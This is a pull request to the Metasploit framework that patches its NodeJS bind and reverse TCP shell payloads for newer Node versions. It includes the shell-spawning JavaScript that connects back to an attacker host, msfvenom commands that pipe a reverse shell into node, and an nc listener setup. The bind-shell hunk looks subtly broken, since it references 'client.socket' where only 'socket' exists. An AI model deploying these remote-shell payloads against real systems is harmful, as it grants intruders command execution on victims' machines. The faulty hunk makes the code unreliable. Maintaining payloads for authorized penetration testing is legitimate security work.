### PR TITLE
Handle missing util.pump in nodejs shell payloads

### DIFF
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -18,8 +18,13 @@ module Msf::Payload::NodeJS
         var server = net.createServer(function(socket) {  
           var sh = cp.spawn(cmd, []);
           socket.pipe(sh.stdin);
-          util.pump(sh.stdout, socket);
-          util.pump(sh.stderr, socket);
+          if (typeof util.pump === "undefined") {
+            sh.stdout.pipe(client.socket);
+            sh.stderr.pipe(client.socket);          
+          } else {
+            util.pump(sh.stdout, client.socket);
+            util.pump(sh.stderr, client.socket);
+          }
         });
         server.listen(#{datastore['LPORT']});
       })();
@@ -53,8 +58,13 @@ module Msf::Payload::NodeJS
         var client = this;
         client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
           client.socket.pipe(sh.stdin);
-          util.pump(sh.stdout, client.socket);
-          util.pump(sh.stderr, client.socket);
+          if (typeof util.pump === "undefined") {
+            sh.stdout.pipe(client.socket);
+            sh.stderr.pipe(client.socket);          
+          } else {
+            util.pump(sh.stdout, client.socket);
+            util.pump(sh.stderr, client.socket);
+          }
         });
       })();
     EOS

--- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1843
+  CachedSize = 2351
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

--- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1971
+  CachedSize = 2423
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
 
 module MetasploitModule
 
-  CachedSize = 456
+  CachedSize = 583
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

--- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
 
 module MetasploitModule
 
-  CachedSize = 488
+  CachedSize = 601
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

--- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 516
+  CachedSize = 629
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS


### PR DESCRIPTION
Modern NodeJS (since 5.3.0) has removed util.pump in favor of stream.pipe. 

On current versions the nodejs tcp shell payloads error out:
```
$ node --version
v7.10.0
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
<snip>
TypeError: util.pump is not a function
    at Socket.<anonymous> ([stdin]:1:405)
    at Object.onceWrapper (events.js:293:19)
    at emitNone (events.js:86:13)
    at Socket.emit (events.js:188:7)
    at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1080:10)
```

With this change, bind and reverse tcp should be tolerant of both new and older versions.

## Reference
https://github.com/nodejs/node/pull/2531

## Verification Steps**

- [ ] Set up a handler (either exploit/multi/handler or simple nc)
```
$ nc -l -v 7777
```

- [ ] Use patched version with various versions of node:
```
msfvenom -p nodejs/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 | node
```

- [ ] Confirm both old (pre 5.3.0) and new versions of node result in shell, not error.

